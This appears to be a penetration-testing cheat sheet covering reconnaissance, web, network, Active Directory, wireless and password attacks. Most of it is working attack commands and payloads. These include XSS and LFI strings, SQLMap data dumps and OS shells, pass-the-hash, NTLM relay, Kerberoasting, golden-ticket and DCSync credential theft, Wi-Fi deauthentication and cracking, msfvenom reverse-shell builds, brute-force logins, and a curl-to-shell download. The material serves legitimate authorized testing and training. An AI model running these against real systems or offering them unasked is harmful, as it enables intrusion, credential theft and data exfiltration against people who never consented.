# Tools Cheatsheet

## Table of Contents

- Reconnaissance
- Web Application Testing
- Network Attacks
- Privilege Escalation
- Active Directory
- Wireless
- Forensics & Reverse Engineering
- Exploitation
- Password Attacks
- Quick Reference
## Reconnaissance

### Nmap

```bash
# Host discovery
nmap -sn 10.0.0.0/24                  # Ping sweep
nmap -PS22,80,443 10.0.0.0/24         # SYN ping
nmap -sV -sC -p- 10.0.0.5 -oA scan    # Full scan with scripts
# Scan types
nmap -sT 10.0.0.5   # TCP connect (logged)
nmap -sS 10.0.0.5   # SYN scan (stealthier)
nmap -sU 10.0.0.5   # UDP scan
nmap -sN 10.0.0.5   # Null scan
nmap -sF 10.0.0.5   # FIN scan
# Output
nmap -oA scan 10.0.0.5        # All formats
nmap -oN scan.nmap 10.0.0.5   # Normal
nmap -oX scan.xml 10.0.0.5    # XML
# Timing (faster = noisier)
nmap -T4 10.0.0.5   # Aggressive (local nets)
nmap -T0 10.0.0.5   # Paranoid (IDS evasion)
```

### DNS Enum
```bash
# One record type per query (dig keeps only one type per name)
dig example.com A
dig example.com MX
dig example.com NS
dig example.com TXT
dig axfr example.com @ns.example.com   # Zone transfer: ask the authoritative server directly
dig +short -x 1.2.3.4                  # Reverse lookup
dnsenum example.com
dnsrecon -d example.com
fierce -dns example.com                # Python rewrite of fierce uses --domain
amass enum -passive -d example.com
subfinder -d example.com
```

### Web Recon
```bash
whatweb example.com
nikto -h http://example.com
gobuster dir -u http://example.com -w wordlist.txt
ffuf -w wordlist.txt -u http://example.com/FUZZ
dirb http://example.com/
```

## Web Application Testing
### Burp Suite

- Proxy → Intercept — Capture/modify requests
- Proxy → HTTP History — All captured traffic
- Target → Site Map — Discovered endpoints
- Intruder → Positions — Fuzzing (Sniper, Pitchfork, Cluster Bomb)
- Repeater — Manual request testing
- Decoder — Encode/decode/hash

### SQLMap
```bash
sqlmap -u "http://example.com/?id=1"                 # Basic
sqlmap -u "http://example.com/" --data="u=p"         # POST
sqlmap -u "http://example.com/" --cookie="sess=1"    # Cookie parameter
sqlmap -u "http://example.com/?id=1" --dbs           # List DBs
sqlmap -u "http://example.com/?id=1" --dump          # Dump data
sqlmap -u "http://example.com/" --os-shell           # OS shell
sqlmap -u "http://example.com/" --batch              # Non-interactive
```

### XSS Payloads
```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert('XSS')">
<a href="javascript:alert('XSS')">click</a>
```

### LFI Payloads
```text
../../etc/passwd
..%252f..%252f..%252fetc/passwd
/proc/self/environ
/proc/net/tcp
```

## Network Attacks
### SMB

```bash
# Null session
smbclient -L //10.0.0.5 -N
enum4linux -a 10.0.0.5
# impacket example scripts (package installs also ship them as impacket-<name>)
python3 GetNPUsers.py domain/ -usersfile users.txt
python3 GetUserSPNs.py domain/user:pass -request -outputfile spn_hashes.txt   # -request needed to save hashes
python3 secretsdump.py domain/user:pass@10.0.0.5
python3 psexec.py domain/user:pass@10.0.0.5
python3 wmiexec.py domain/user:pass@10.0.0.5
```

### Pass-the-Hash
```bash
# Metasploit
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:HASH   # LM:NT (empty LM hash shown)
# CrackMapExec / NetExec (NetExec installs the same CLI as nxc)
cme smb 10.0.0.5 -u administrator -H "HASH" -x "whoami"
```

### Responder / Relay
```bash
responder -I eth0 -dwv
ntlmrelayx.py -tf targets.txt -smb2support
```

## Privilege Escalation
### Linux

```bash
# Find SUID
find / -perm -4000 -type f 2>/dev/null
# Sudo exploits
sudo -l
# Check GTFOBins: https://gtfobins.github.io/
# Enumeration scripts
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
./linpeas.sh
# Kernel exploits: get the kernel version, then search
uname -a
searchsploit "Linux Kernel"
```

### Windows
```powershell
# Enumeration
whoami /all
whoami /priv
systeminfo
wmic qfe                  # Installed hotfixes
# Scripts
.\winPEASany.exe quiet fast
.\Seatbelt.exe -group=user
# Token impersonation
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami"
.\PrintSpoofer.exe -c "whoami"
# Check SeImpersonatePrivilege
whoami /priv | findstr "Impersonate"
```

## Active Directory
### Kerberos

```bash
# AS-REP Roasting
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat -outputfile hashes.txt
hashcat -m 18200 hashes.txt wordlist.txt
# Kerberoasting
python3 GetUserSPNs.py domain/user:pass -request -outputfile spn_hashes.txt
hashcat -m 13100 spn_hashes.txt wordlist.txt
# Golden Ticket (typed at the mimikatz prompt)
mimikatz # kerberos::golden /domain:DOMAIN /sid:SID /krbtgt:HASH /user:Administrator /ticket:golden.kirbi
# DCSync
mimikatz # lsadump::dcsync /domain:DOMAIN /user:krbtgt
python3 secretsdump.py domain/user:pass@dc.domain.com
```

### BloodHound
```bash
# bloodhound-python collector: -dc takes the DC hostname, -ns the DNS server IP
python3 bloodhound.py -c All -u user -p password -d domain.local -dc dc.domain.local -ns 10.0.0.5
# Or on Windows with SharpHound (dot-source the script, then run the collector)
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
# Analyze in BloodHound GUI
```

## Wireless
### WPA2

```bash
# Monitor mode
airmon-ng start wlan0
# Discover networks
airodump-ng wlan0mon
# Capture handshake for one AP (writes capture-01.cap)
airodump-ng wlan0mon --bssid MAC -c CHANNEL -w capture
# Deauth (interface is the last argument)
aireplay-ng -0 5 -a AP_MAC -c CLIENT_MAC wlan0mon
# Crack handshake
aircrack-ng capture-01.cap -w wordlist.txt
# PMKID
hcxdumptool -i wlan0mon -o pmkid.pcapng
hcxpcaptool -z pmkid_hashes.txt pmkid.pcapng   # current hcxtools: hcxpcapngtool -o hash.22000 (hashcat -m 22000)
hashcat -m 16800 pmkid_hashes.txt wordlist.txt
```

## Forensics & Reverse Engineering
### File Analysis

```bash
file filename
binwalk filename
binwalk -e filename               # Extract embedded files
foremost -i filename -o output    # Carve files by header
strings filename | grep -i flag
exiftool filename                 # Metadata
```

### Memory Forensics
```bash
# Volatility 3
python3 vol.py -f memory.dmp windows.info
python3 vol.py -f memory.dmp windows.pslist
python3 vol.py -f memory.dmp windows.malfind
python3 vol.py -f memory.dmp windows.hashdump
```

### GDB / Pwndbg
```bash
gdb ./binary
pwndbg ./binary          # gdb with the pwndbg plugin loaded
# Commands (inside gdb):
run                      # Execute
break *0xaddress         # Set breakpoint
nexti / stepi            # Step one instruction (over / into calls)
info registers           # Registers
x/100x $rsp              # Examine stack
```

## Exploitation
### Metasploit

```bash
msfconsole
search exploit_name
use module_number
show options
set RHOSTS 10.0.0.5
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.0.0.4
set LPORT 443
run
```

### msfvenom
```bash
# Payloads
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=443 -f exe -o shell.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elf
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=443 -f war -o shell.war
# Staged vs Stageless
-p windows/x64/meterpreter/reverse_tcp   # Staged (meterpreter loaded in stages)
-p windows/x64/meterpreter_reverse_tcp   # Stageless (all in one)
```

### pwntools
```python
from pwn import *

context.update(arch='i386', os='linux')
p = remote('target', 1337)     # Remote service: (host, port)
# or
p = process('./binary')        # Local binary
# Interaction
p.sendline(b'payload')
print(p.recvline())
p.interactive()
# GDB debugging (attach to the running process)
gdb.attach(p, '''
break *0xaddress
continue
''')
```

## Password Attacks
### Hashcat

```bash
# Modes
# -m 0      MD5
# -m 100    SHA1
# -m 1400   SHA256
# -m 1700   SHA512
# -m 5600   NetNTLMv2
# -m 13100  Kerberos TGS (Kerberoast)
# -m 18200  AS-REP (AS-REP roast)
# -m 2500   WPA2 handshake (hccapx; current hashcat uses 22000)
# -m 16800  PMKID
# Examples
hashcat -m 0 hash.txt wordlist.txt
hashcat -m 2500 handshake.hccapx wordlist.txt
hashcat -m 13100 spn_hashes.txt wordlist.txt -r rules/best64.rule
```

### Hydra
```bash
hydra -l user -P passwords.txt ssh://10.0.0.5
hydra -l admin -P passwords.txt rdp://10.0.0.5
hydra -L users.txt -P passwords.txt 10.0.0.5 smb
hydra -l user -P passwords.txt 10.0.0.5 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
```

### John the Ripper
```bash
john --wordlist=wordlist.txt hashes.txt
john --rules --wordlist=wordlist.txt hashes.txt
john --show hashes.txt               # Show cracked passwords
# Format detection
john --list=formats | grep -i md5
```

## Quick Reference
| Port | Service | Key Tool |
|---|---|---|
| 21 | FTP | hydra, msfconsole |
| 22 | SSH | hydra, ssh |
| 23 | Telnet | hydra |
| 25 | SMTP | hydra, send-email |
| 53 | DNS | dig, nslookup |
| 80/443 | HTTP/S | Burp, SQLMap, ffuf |
| 135 | RPC | rpcclient, impacket |
| 139/445 | SMB | enum4linux, impacket |
| 1433 | MSSQL | sqsh, impacket |
| 3306 | MySQL | mysql, sqlmap |
| 3389 | RDP | xfreerdp, hydra |
| 5432 | PostgreSQL | psql, sqlmap |
| 5985/5986 | WinRM | evil-winrm, hydra |
| 6379 | Redis | redis-cli |
| 8080 | HTTP Alt | Burp, SQLMap |
| 27017 | MongoDB | mongosh |